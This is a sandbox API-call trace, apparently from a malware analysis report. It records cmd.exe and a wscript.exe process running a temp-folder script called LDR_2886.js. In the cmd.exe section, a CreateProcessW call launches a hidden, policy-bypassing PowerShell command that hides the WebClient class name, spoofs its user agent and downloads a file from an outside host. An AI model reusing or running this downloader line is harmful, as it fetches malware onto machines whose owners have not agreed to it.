	[0051.268] FindFirstFileExW (in: lpFileName="C:\\Windows\\PowErshelL.eXe.*", fInfoLevelId=0x1, lpFindFileData=0x13ec60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x13ec60) returned 0xffffffffffffffff
	[0051.268] GetLastError () returned 0x2
	[0051.268] FindFirstFileExW (in: lpFileName="C:\\Windows\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x13ec60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x13ec60) returned 0xffffffffffffffff
	[0051.269] GetLastError () returned 0x2
	[0051.269] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0051.269] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x13ec60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x13ec60) returned 0xffffffffffffffff
	[0051.269] GetLastError () returned 0x2
	[0051.269] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\PowErshelL.eXe.*", fInfoLevelId=0x1, lpFindFileData=0x13ec60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x13ec60) returned 0xffffffffffffffff
	[0051.270] GetLastError () returned 0x2
	[0051.270] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x13ec60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x13ec60) returned 0xffffffffffffffff
	[0051.270] GetLastError () returned 0x2
	[0051.270] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0051.270] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x13ec60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x13ec60) returned 0x34a480
	[0051.271] GetProcessHeap () returned 0x330000
	[0051.271] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x0, Size=0x28) returned 0x3449a0
	[0051.271] FindClose (in: hFindFile=0x34a480 | out: hFindFile=0x34a480) returned 1
	[0051.272] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2
	[0051.272] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3
	[0051.272] GetConsoleTitleW (in: lpConsoleTitle=0x13f1b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0051.272] InitializeProcThreadAttributeList (in: lpAttributeList=0x13ef68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x13ef28 | out: lpAttributeList=0x13ef68, lpSize=0x13ef28) returned 1
	[0051.272] UpdateProcThreadAttribute (in: lpAttributeList=0x13ef68, dwFlags=0x0, Attribute=0x60001, lpValue=0x13ef18, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x13ef68, lpPreviousValue=0x0) returned 1
	[0051.272] GetStartupInfoW (in: lpStartupInfo=0x13f080 | out: lpStartupInfo=0x13f080*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) 
	[0051.273] lstrcmpW (lpString1="\\powershell.exe", lpString2="\\XCOPY.EXE") returned -1
	[0051.274] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpCommandLine="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\aETAdzjz\\Documents", lpStartupInfo=0x13efa0*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x13ef50 | out: lpCommandLine="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", lpProcessInformation=0x13ef50*(hProcess=0x54, hThread=0x50, dwProcessId=0x8b8, dwThreadId=0x8b4)) returned 1
	[0051.286] CloseHandle (hObject=0x50) returned 1
	[0051.286] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0051.286] GetProcessHeap () returned 0x330000
	[0051.286] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x34bb10 | out: hHeap=0x330000) returned 1
	[0051.286] GetEnvironmentStringsW () returned 0x34b8d0*
	[0051.286] GetProcessHeap () returned 0x330000
	[0051.286] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xb2c) returned 0x34c820
	[0051.286] FreeEnvironmentStringsW (penv=0x34b8d0) returned 1
	[0051.286] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) 

Process:
	id = "6"
	image_name = "wscript.exe"
	filename = "c:\\windows\\system32\\wscript.exe"
	page_root = "0x1e46c000"
	os_pid = "0x41c"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x910"
	cmd_line = "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" "
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 51
	os_tid = 0x8c0

	[0051.675] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fe60 | out: lpSystemTimeAsFileTime=0x24fe60*(dwLowDateTime=0x97a451e0, dwHighDateTime=0x1d543d1)) 
	[0051.675] GetCurrentProcessId () returned 0x41c
	[0051.675] GetCurrentThreadId () returned 0x8c0
	[0051.675] GetTickCount () returned 0x1def8
	[0051.675] QueryPerformanceCounter (in: lpPerformanceCount=0x24fe68 | out: lpPerformanceCount=0x24fe68*=17610102718) returned 1
	[0051.675] GetStartupInfoA (in: lpStartupInfo=0x24fe80 | out: lpStartupInfo=0x24fe80*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\WScript.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffffffffffff, hStdOutput=0xffffffffffffffff, hStdError=0xffffffffffffffff)) 
	[0051.676] GetModuleHandleA (lpModuleName=0x0) returned 0xff8d0000
	[0051.676] GetModuleHandleA (lpModuleName=0x0) returned 0xff8d0000
	[0051.676] GetVersionExA (in: lpVersionInformation=0x24fda0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x341eb0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24fda0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0051.676] GetUserDefaultLCID () returned 0x409
	[0051.677] CoInitialize (pvReserved=0x0) returned 0x0
	[0051.842] GetCommandLineW () returned="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" "
	[0051.842] lstrlenW (lpString="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" ") returned 85
	[0051.842] ??2@YAPEAX_K@Z () returned 0x3157b0
	[0051.843] ??2@YAPEAX_K@Z () returned 0x315f60
	[0051.843] GetCurrentThreadId () returned 0x8c0
	[0051.843] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x24fae8 | out: phkResult=0x24fae8*=0x7c) returned 0x0
	[0051.843] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x24fae0 | out: phkResult=0x24fae0*=0x80) returned 0x0
	[0051.843] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x24ede8, lpData=0x24f1f0, lpcbData=0x24ede0*=0x400 | out: lpType=0x24ede8*=0x0, lpData=0x24f1f0*=0x67, lpcbData=0x24ede0*=0x400) returned 0x2
	[0051.843] RegQueryValueExW (in: hKey=0x7c, lpValueName="Enabled", lpReserved=0x0, lpType=0x24ede8, lpData=0x24f1f0, lpcbData=0x24ede0*=0x400 | out: lpType=0x24ede8*=0x0, lpData=0x24f1f0*=0x67, lpcbData=0x24ede0*=0x400) returned 0x2
	[0051.843] RegQueryValueExW (in: hKey=0x80, lpValueName="Enabled", lpReserved=0x0, lpType=0x24ede8, lpData=0x24f1f0, lpcbData=0x24ede0*=0x400 | out: lpType=0x24ede8*=0x0, lpData=0x24f1f0*=0x67, lpcbData=0x24ede0*=0x400) returned 0x2
	[0051.843] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
	[0052.199] RegCloseKey (hKey=0x80) returned 0x0
	[0052.199] RegCloseKey (hKey=0x7c) returned 0x0
	[0052.199] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x24f800 | out: phkResult=0x24f800*=0x7c) returned 0x0
	[0052.199] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x24f7f8 | out: phkResult=0x24f7f8*=0x80) returned 0x0
	[0052.199] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x24eb08, lpData=0x24ef10, lpcbData=0x24eb00*=0x400 | out: lpType=0x24eb08*=0x0, lpData=0x24ef10*=0x0, lpcbData=0x24eb00*=0x400) returned 0x2
	[0052.199] RegQueryValueExW (in: hKey=0x7c, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x24eb08, lpData=0x24ef10, lpcbData=0x24eb00*=0x400 | out: lpType=0x24eb08*=0x0, lpData=0x24ef10*=0x0, lpcbData=0x24eb00*=0x400) returned 0x2
	[0052.199] RegQueryValueExW (in: hKey=0x80, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x24eb08, lpData=0x24ef10, lpcbData=0x24eb00*=0x400 | out: lpType=0x24eb08*=0x0, lpData=0x24ef10*=0x0, lpcbData=0x24eb00*=0x400) returned 0x2
	[0052.199] RegCloseKey (hKey=0x80) returned 0x0
	[0052.199] RegCloseKey (hKey=0x7c) returned 0x0
	[0052.199] GetACP () returned 0x4e4
	[0052.199] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77040000
	[0052.199] GetProcAddress (hModule=0x77040000, lpProcName="HeapSetInformation") returned 0x7705c4a0
	[0052.199] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0052.199] FreeLibrary (hLibModule=0x77040000) returned 1
	[0052.199] ??2@YAPEAX_K@Z () returned 0x315f80
	[0052.200] CoRegisterMessageFilter (in: lpMessageFilter=0x315f80, lplpMessageFilter=0x315f90 | out: lplpMessageFilter=0x315f90*=0x0) returned 0x0
	[0052.200] GetModuleFileNameW (in: hModule=0xff8d0000, lpFilename=0x24fb40, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0052.200] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", lpdwHandle=0x24f490 | out: lpdwHandle=0x24f490) returned 0x704
	[0052.201] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", dwHandle=0x0, dwLen=0x704, lpData=0x24ed80 | out: lpData=0x24ed80) returned 1
	[0052.201] VerQueryValueW (in: pBlock=0x24ed80, lpSubBlock="\\", lplpBuffer=0x24f498, puLen=0x24f494 | out: lplpBuffer=0x24f498*=0x24eda8, puLen=0x24f494) returned 1
	[0052.201] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x24f4e8 | out: phkResult=0x24f4e8*=0x7c) returned 0x0
	[0052.201] RegQueryValueExW (in: hKey=0x7c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x24e838, lpData=0x24ec40, lpcbData=0x24e830*=0x400 | out: lpType=0x24e838*=0x0, lpData=0x24ec40*=0x0, lpcbData=0x24e830*=0x400) returned 0x2
	[0052.201] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x24f4a0 | out: phkResult=0x24f4a0*=0x80) returned 0x0
	[0052.201] RegQueryValueExW (in: hKey=0x80, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x24f464, lpData=0x24f4e0, lpcbData=0x24f460*=0x4 | out: lpType=0x24f464*=0x0, lpData=0x24f4e0*=0x10, lpcbData=0x24f460*=0x4) returned 0x2
	[0052.201] RegQueryValueExW (in: hKey=0x80, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x24e838, lpData=0x24ec40, lpcbData=0x24e830*=0x400 | out: lpType=0x24e838*=0x0, lpData=0x24ec40*=0x0, lpcbData=0x24e830*=0x400) returned 0x2
	[0052.201] RegQueryValueExW (in: hKey=0x7c, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x24f464, lpData=0x24f4e0, lpcbData=0x24f460*=0x4 | out: lpType=0x24f464*=0x0, lpData=0x24f4e0*=0x10, lpcbData=0x24f460*=0x4) returned 0x2
	[0052.201] RegQueryValueExW (in: hKey=0x7c, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x24e838, lpData=0x24ec40, lpcbData=0x24e830*=0x400 | out: lpType=0x24e838*=0x1, lpData="1", lpcbData=0x24e830*=0x4) returned 0x0
	[0052.201] lstrlenW (lpString="1") returned 1
	[0052.201] lstrlenW (lpString="0") returned 1
	[0052.201] lstrlenW (lpString="1") returned 1
	[0052.201] lstrlenW (lpString="no") returned 2
	[0052.201] lstrlenW (lpString="1") returned 1
	[0052.201] lstrlenW (lpString="false") returned 5
	[0052.201] RegCloseKey (hKey=0x80) returned 0x0
	[0052.201] RegCloseKey (hKey=0x7c) returned 0x0
	[0052.202] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x24f4e8, lpdwDisposition=0x0 | out: phkResult=0x24f4e8*=0x7c, lpdwDisposition=0x0) returned 0x0
	[0052.202] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x24f484, lpData=0x24f4e0, lpcbData=0x24f480*=0x4 | out: lpType=0x24f484*=0x0, lpData=0x24f4e0*=0x10, lpcbData=0x24f480*=0x4) returned 0x2
	[0052.202] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x24e858, lpData=0x24ec60, lpcbData=0x24e850*=0x400 | out: lpType=0x24e858*=0x1, lpData="1", lpcbData=0x24e850*=0x4) returned 0x0
	[0052.202] lstrlenW (lpString="1") returned 1
	[0052.202] lstrlenW (lpString="0") returned 1
	[0052.202] lstrlenW (lpString="1") returned 1
	[0052.202] lstrlenW (lpString="no") returned 2
	[0052.202] lstrlenW (lpString="1") returned 1
	[0052.202] lstrlenW (lpString="false") returned 5
	[0052.202] RegCloseKey (hKey=0x7c) returned 0x0
	[0052.202] RegCreateKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x24f4e8, lpdwDisposition=0x0 | out: phkResult=0x24f4e8*=0x7c, lpdwDisposition=0x0) returned 0x0
	[0052.202] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x24f484, lpData=0x24f4e0, lpcbData=0x24f480*=0x4 | out: lpType=0x24f484*=0x0, lpData=0x24f4e0*=0x10, lpcbData=0x24f480*=0x4) returned 0x2
	[0052.202] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x24e858, lpData=0x24ec60, lpcbData=0x24e850*=0x400 | out: lpType=0x24e858*=0x0, lpData=0x24ec60*=0x31, lpcbData=0x24e850*=0x400) returned 0x2
	[0052.202] RegCloseKey (hKey=0x7c) returned 0x0
	[0052.202] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js") returned 48
	[0052.202] lstrlenW (lpString="js") returned 2
	[0052.202] lstrlenW (lpString="WSH") returned 3
	[0052.202] ??2@YAPEAX_K@Z () returned 0x315870
	[0052.202] LoadStringW (in: hInstance=0xff8d0000, uID=0x9c5, lpBuffer=0x24df50, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13
	[0052.203] LoadTypeLib (in: szFile="C:\\Windows\\System32\\WScript.exe", pptlib=0x24ef90*=0x0 | out: pptlib=0x24ef90*=0x36d100) returned 0x0
	[0052.207] ITypeLib:GetTypeInfoOfGuid (in: This=0x36d100, GUID=0xff8d58f0, ppTInfo=0x24ef78 | out: ppTInfo=0x24ef78*=0x36e4e8) returned 0x0
	[0052.210] ITypeInfo:GetRefTypeOfImplType (in: This=0x36e4e8, index=0xffffffff, pRefType=0x24ef70 | out: pRefType=0x24ef70*=0xfffffffe) returned 0x0
	[0052.210] ITypeInfo:GetRefTypeInfo (in: This=0x36e4e8, hreftype=0xfffffffe, ppTInfo=0xff8ef458 | out: ppTInfo=0xff8ef458*=0x36e540) returned 0x0
	[0052.210] IUnknown:Release (This=0x36e4e8) returned 0x1
	[0052.210] ??2@YAPEAX_K@Z () returned 0x315900
	[0052.210] ??2@YAPEAX_K@Z () returned 0x3159a0
	[0052.210] ??2@YAPEAX_K@Z () returned 0x315a00
	[0052.210] ITypeLib:GetTypeInfoOfGuid (in: This=0x36d100, GUID=0xff8d5950, ppTInfo=0x24ef78 | out: ppTInfo=0x24ef78*=0x36e598) returned 0x0
	[0052.211] ITypeInfo:GetRefTypeOfImplType (in: This=0x36e598, index=0xffffffff, pRefType=0x24ef70 | out: pRefType=0x24ef70*=0xfffffffe) returned 0x0
	[0052.211] ITypeInfo:GetRefTypeInfo (in: This=0x36e598, hreftype=0xfffffffe, ppTInfo=0xff8ef4d8 | out: ppTInfo=0xff8ef4d8*=0x36e5f0) returned 0x0
	[0052.211] IUnknown:Release (This=0x36e598) returned 0x1
	[0052.211] ITypeLib:GetTypeInfoOfGuid (in: This=0x36d100, GUID=0xff8d5960, ppTInfo=0x24ef78 | out: ppTInfo=0x24ef78*=0x36e648) returned 0x0
	[0052.211] ITypeInfo:GetRefTypeOfImplType (in: This=0x36e648, index=0xffffffff, pRefType=0x24ef70 | out: pRefType=0x24ef70*=0xfffffffe) returned 0x0
	[0052.211] ITypeInfo:GetRefTypeInfo (in: This=0x36e648, hreftype=0xfffffffe, ppTInfo=0xff8ef518 | out: ppTInfo=0xff8ef518*=0x36e6a0) returned 0x0
	[0052.213] IUnknown:Release (This=0x36e648) returned 0x1
	[0052.213] ITypeLib:GetTypeInfoOfGuid (in: This=0x36d100, GUID=0xff8d5910, ppTInfo=0x24ef78 | out: ppTInfo=0x24ef78*=0x36e6f8) returned 0x0
	[0052.213] ITypeInfo:GetRefTypeOfImplType (in: This=0x36e6f8, index=0xffffffff, pRefType=0x24ef70 | out: pRefType=0x24ef70*=0xfffffffe) returned 0x0
	[0052.213] ITypeInfo:GetRefTypeInfo (in: This=0x36e6f8, hreftype=0xfffffffe, ppTInfo=0xff8ef498 | out: ppTInfo=0xff8ef498*=0x36e750) returned 0x0
	[0052.213] IUnknown:Release (This=0x36e6f8) returned 0x1
	[0052.213] IUnknown:Release (This=0x36d100) returned 0x4
	[0052.213] ??2@YAPEAX_K@Z () returned 0x315a60
	[0052.213] GetCurrentThreadId () returned 0x8c0
	[0052.213] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xcc
	[0052.213] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xff8e1cf8, lpParameter=0x315a60, dwCreationFlags=0x0, lpThreadId=0x315a88 | out: lpThreadId=0x315a88*=0x8d4) returned 0xd4
	[0052.214] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x24f1d0*=0xcc, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
	[0052.319] CloseHandle (hObject=0xcc) returned 1
	[0052.319] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js", nBufferLength=0x104, lpBuffer=0x24f260, lpFilePart=0x24f250 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js", lpFilePart=0x24f250*="LDR_2886.js") returned 0x30
	[0052.319] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey=".js", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e770 | out: phkResult=0x24e770*=0xe6) returned 0x0
	[0052.319] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x24e720, lpData=0x24e780, lpcbData=0x24e724*=0x800 | out: lpType=0x24e720*=0x1, lpData="JSFile", lpcbData=0x24e724*=0xe) returned 0x0
	[0052.319] RegCloseKey (hKey=0xe6) returned 0x0
	[0052.319] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="JSFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e770 | out: phkResult=0x24e770*=0xe6) returned 0x0
	[0052.320] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x24e720, lpData=0x24eff0, lpcbData=0x24e724*=0x200 | out: lpType=0x24e720*=0x1, lpData="JScript", lpcbData=0x24e724*=0x10) returned 0x0
	[0052.320] RegCloseKey (hKey=0xe6) returned 0x0
	[0052.320] ??2@YAPEAX_K@Z () returned 0x3163a0
	[0052.320] GetProcessHeap () returned 0x340000
	[0052.320] RtlAllocateHeap (HeapHandle=0x340000, Flags=0x0, Size=0x2000) returned 0x378430
	[0052.320] CLSIDFromString (in: lpsz="JScript", pclsid=0x24ef68 | out: pclsid=0x24ef68*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58))) returned 0x0
	[0052.321] CoCreateInstance (in: rclsid=0x24ef68*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xff8d1800*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x24ef60 | out: ppv=0x24ef60*=0x316780) returned 0x0
	[0052.330] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24d160 | out: lpSystemTimeAsFileTime=0x24d160*(dwLowDateTime=0x98084ba0, dwHighDateTime=0x1d543d1)) 
	[0052.330] GetCurrentProcessId () returned 0x41c
	[0052.330] GetCurrentThreadId () returned 0x8c0
	[0052.330] GetTickCount () returned 0x1e187
	[0052.331] QueryPerformanceCounter (in: lpPerformanceCount=0x24d168 | out: lpPerformanceCount=0x24d168*=17675661926) returned 1
	[0052.331] malloc (_Size=0x100) returned 0x316670
	[0052.331] __dllonexit () returned 0x7fee3220728
	[0052.331] __dllonexit () returned 0x7fee3220780
	[0052.331] __dllonexit () returned 0x7fee3220750
	[0052.331] __dllonexit () returned 0x7fee32207b0
	[0052.332] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefd710000
	[0052.332] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegisterTraceGuidsA") returned 0x7717f570
	[0052.332] EtwRegisterTraceGuidsA () returned 0x0
	[0052.332] EtwRegisterTraceGuidsA () returned 0x0
	[0052.332] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24cd50, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0052.333] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegOpenKeyExA") returned 0x7fefd72b5f0
	[0052.333] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x24ceb8 | out: phkResult=0x24ceb8*=0x0) returned 0x2
	[0052.338] GetVersion () returned 0x1db10106
	[0052.338] ??2@YAPEAX_K@Z () returned 0x315aa0
	[0052.339] ??2@YAPEAX_K@Z () returned 0x316780
	[0052.339] GetUserDefaultLCID () returned 0x409
	[0052.339] GetACP () returned 0x4e4
	[0052.339] ??3@YAXPEAX@Z () returned 0x15720801
	[0052.339] GetCurrentThreadId () returned 0x8c0
	[0052.339] ??2@YAPEAX_K@Z () returned 0x315aa0
	[0052.339] GetCurrentThreadId () returned 0x8c0
	[0052.340] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\COM3", ulOptions=0x0, samDesired=0x20019, phkResult=0x24ee98 | out: phkResult=0x24ee98*=0x104) returned 0x0
	[0052.340] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegQueryValueExA") returned 0x7fefd72c480
	[0052.340] RegQueryValueExA (in: hKey=0x104, lpValueName="COM+Enabled", lpReserved=0x0, lpType=0x24ee90, lpData=0x24ee88, lpcbData=0x24ee80*=0x4 | out: lpType=0x24ee90*=0x4, lpData=0x24ee88*=0x1, lpcbData=0x24ee80*=0x4) returned 0x0
	[0052.340] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegCloseKey") returned 0x7fefd730710
	[0052.340] RegCloseKey (hKey=0x104) returned 0x0
	[0052.340] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7fefea30000
	[0052.340] GetProcAddress (hModule=0x7fefea30000, lpProcName="CoGetObjectContext") returned 0x7fefea4c920
	[0052.340] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefea30000
	[0052.340] GetProcAddress (hModule=0x7fefea30000, lpProcName="CoCreateInstance") returned 0x7fefea57490
